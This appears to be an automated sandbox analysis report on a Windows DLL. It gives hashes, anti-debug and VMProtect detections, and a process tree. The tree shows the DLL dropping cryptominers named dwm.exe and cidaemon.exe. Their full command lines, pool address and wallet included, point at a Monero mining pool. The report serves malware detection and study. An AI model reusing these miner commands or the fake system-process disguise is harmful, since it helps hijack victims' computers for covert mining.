Analysis
-
max time kernel
169s -
max time network
200s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system -
submitted
24-11-2022 00:04
Static task
static1
Behavioral task
behavioral1
Sample
f2f91e4c73d90077922c861830c41d13521fe207bbca5966471ec28cc036cf70.dll
Resource
win7-20221111-en
Behavioral task
behavioral2
Sample
f2f91e4c73d90077922c861830c41d13521fe207bbca5966471ec28cc036cf70.dll
Resource
win10v2004-20221111-en
General
-
Target
f2f91e4c73d90077922c861830c41d13521fe207bbca5966471ec28cc036cf70.dll
-
Size
4.6MB
-
MD5
3e1ed972a8d8bdc771949e28d68cd3f3
-
SHA1
2cdf048397f297b21d146864800c911e42bdf223
-
SHA256
f2f91e4c73d90077922c861830c41d13521fe207bbca5966471ec28cc036cf70
-
SHA512
d68a053aa2325182b7582b409039d6edfbcf48ff6027acde62c33441e587e409aa015d55df27d57947a68ff946152ac6dcd972facf25fefba95e6b00d0c4df84
-
SSDEEP
98304:Bvrr7GMY+Ukb8fljBEB/X+eMC/Q56aYMsrHRc/2nBmmk1FXUessPF:tr/meBPRMC/nalsT+/WmBFXO0
Malware Config
Signatures
-
Executes dropped EXE 2 IoCs
Processes:
dwm.execidaemon.exepid process 1792 dwm.exe 3612 cidaemon.exe -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\msupdate71\dwm.exe vmprotect C:\Users\Admin\AppData\Local\Temp\msupdate71\cidaemon.exe vmprotect C:\Users\Admin\AppData\Local\Temp\msupdate71\dwm.exe vmprotect behavioral2/memory/1792-138-0x00007FF70C380000-0x00007FF70C72D000-memory.dmp vmprotect C:\Users\Admin\AppData\Local\Temp\msupdate71\cidaemon.exe vmprotect behavioral2/memory/3612-142-0x00007FF709480000-0x00007FF70984F000-memory.dmp vmprotect behavioral2/memory/1792-143-0x00007FF70C380000-0x00007FF70C72D000-memory.dmp vmprotect behavioral2/memory/1792-144-0x00007FF70C380000-0x00007FF70C72D000-memory.dmp vmprotect -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
dwm.exepid process 1792 dwm.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
rundll32.exepid process 1464 rundll32.exe 1464 rundll32.exe 1464 rundll32.exe 1464 rundll32.exe 1464 rundll32.exe 1464 rundll32.exe 1464 rundll32.exe 1464 rundll32.exe 1464 rundll32.exe 1464 rundll32.exe 1464 rundll32.exe 1464 rundll32.exe 1464 rundll32.exe 1464 rundll32.exe 1464 rundll32.exe 1464 rundll32.exe 1464 rundll32.exe 1464 rundll32.exe 1464 rundll32.exe 1464 rundll32.exe 1464 rundll32.exe 1464 rundll32.exe 1464 rundll32.exe 1464 rundll32.exe 1464 rundll32.exe 1464 rundll32.exe 1464 rundll32.exe 1464 rundll32.exe 1464 rundll32.exe 1464 rundll32.exe 1464 rundll32.exe 1464 rundll32.exe 1464 rundll32.exe 1464 rundll32.exe 1464 rundll32.exe 1464 rundll32.exe 1464 rundll32.exe 1464 rundll32.exe 1464 rundll32.exe 1464 rundll32.exe 1464 rundll32.exe 1464 rundll32.exe 1464 rundll32.exe 1464 rundll32.exe 1464 rundll32.exe 1464 rundll32.exe 1464 rundll32.exe 1464 rundll32.exe 1464 rundll32.exe 1464 rundll32.exe 1464 rundll32.exe 1464 rundll32.exe 1464 rundll32.exe 1464 rundll32.exe 1464 rundll32.exe 1464 rundll32.exe 1464 rundll32.exe 1464 rundll32.exe 1464 rundll32.exe 1464 rundll32.exe 1464 rundll32.exe 1464 rundll32.exe 1464 rundll32.exe 1464 rundll32.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
dwm.exedescription pid process Token: SeLockMemoryPrivilege 1792 dwm.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
rundll32.exepid process 1464 rundll32.exe 1464 rundll32.exe -
Suspicious use of WriteProcessMemory 7 IoCs
Processes:
rundll32.exerundll32.exedescription pid process target process PID 640 wrote to memory of 1464 640 rundll32.exe rundll32.exe PID 640 wrote to memory of 1464 640 rundll32.exe rundll32.exe PID 640 wrote to memory of 1464 640 rundll32.exe rundll32.exe PID 1464 wrote to memory of 1792 1464 rundll32.exe dwm.exe PID 1464 wrote to memory of 1792 1464 rundll32.exe dwm.exe PID 1464 wrote to memory of 3612 1464 rundll32.exe cidaemon.exe PID 1464 wrote to memory of 3612 1464 rundll32.exe cidaemon.exe
Processes
-
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\f2f91e4c73d90077922c861830c41d13521fe207bbca5966471ec28cc036cf70.dll,#11⤵
- Suspicious use of WriteProcessMemory
PID:640 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\f2f91e4c73d90077922c861830c41d13521fe207bbca5966471ec28cc036cf70.dll,#12⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1464 -
C:\Users\Admin\AppData\Local\Temp\msupdate71\dwm.exeC:\Users\Admin\AppData\Local\Temp\msupdate71\dwm.exe -o stratum+tcp://xmr-usa.dwarfpool.com:8080 -dbg -1 -p x -u 48mqxx742xV9MJHqHy7XQVJYKT6j1SmJBJTeJSRD2zfve1NdSg9io4yWUCsc7JJH8bgDg9opBicsJZtLTAGzswRiGZGUJ6v.23⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:1792 -
C:\Users\Admin\AppData\Local\Temp\msupdate71\cidaemon.exeC:\Users\Admin\AppData\Local\Temp\msupdate71\cidaemon.exe -o stratum+tcp://xmr-usa.dwarfpool.com:8080 -dbg -1 -p x -u 48mqxx742xV9MJHqHy7XQVJYKT6j1SmJBJTeJSRD2zfve1NdSg9io4yWUCsc7JJH8bgDg9opBicsJZtLTAGzswRiGZGUJ6v.33⤵
- Executes dropped EXE
PID:3612
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\msupdate71\cidaemon.exeFilesize
1.6MB
MD569e6e75f2219d64f3c776d2ef313b9ff
SHA1211042ac764db953ca0c54117aff8e241d86e4fe
SHA25609bb784499c13f9a43548d0e660ba4e5f009f06f5d5da5d57d11a1b4aceb1f8a
SHA512fa77b1bcc58d150df3e68fc64373302f71e2abcc058e0f6a1e29cfa44336146d8aa299c54bbc77e2ff877f0179a4429dcf01b841ede0379a8c7236fbab820410
-
C:\Users\Admin\AppData\Local\Temp\msupdate71\cidaemon.exeFilesize
1.6MB
MD569e6e75f2219d64f3c776d2ef313b9ff
SHA1211042ac764db953ca0c54117aff8e241d86e4fe
SHA25609bb784499c13f9a43548d0e660ba4e5f009f06f5d5da5d57d11a1b4aceb1f8a
SHA512fa77b1bcc58d150df3e68fc64373302f71e2abcc058e0f6a1e29cfa44336146d8aa299c54bbc77e2ff877f0179a4429dcf01b841ede0379a8c7236fbab820410
-
C:\Users\Admin\AppData\Local\Temp\msupdate71\dwm.exeFilesize
1.5MB
MD5eedb9d86ae8abc65fa7ac7c6323d4e8f
SHA1ce1fbf382e89146ea5a22ae551b68198c45f40e4
SHA256d0326f0ddce4c00f93682e3a6f55a3125f6387e959e9ed6c5e5584e78e737078
SHA5129de3390197a02965feed6acdc77a292c0ef160e466fbfc9500fa7de17b0225a935127da71029cb8006bc7a5f4b5457319362b7a7caf4c0bf92174d139ed52ab5
-
C:\Users\Admin\AppData\Local\Temp\msupdate71\dwm.exeFilesize
1.5MB
MD5eedb9d86ae8abc65fa7ac7c6323d4e8f
SHA1ce1fbf382e89146ea5a22ae551b68198c45f40e4
SHA256d0326f0ddce4c00f93682e3a6f55a3125f6387e959e9ed6c5e5584e78e737078
SHA5129de3390197a02965feed6acdc77a292c0ef160e466fbfc9500fa7de17b0225a935127da71029cb8006bc7a5f4b5457319362b7a7caf4c0bf92174d139ed52ab5
-
memory/1464-132-0x0000000000000000-mapping.dmp
-
memory/1792-133-0x0000000000000000-mapping.dmp
-
memory/1792-138-0x00007FF70C380000-0x00007FF70C72D000-memory.dmpFilesize
3.7MB
-
memory/1792-143-0x00007FF70C380000-0x00007FF70C72D000-memory.dmpFilesize
3.7MB
-
memory/1792-144-0x00007FF70C380000-0x00007FF70C72D000-memory.dmpFilesize
3.7MB
-
memory/3612-135-0x0000000000000000-mapping.dmp
-
memory/3612-142-0x00007FF709480000-0x00007FF70984F000-memory.dmpFilesize
3.8MB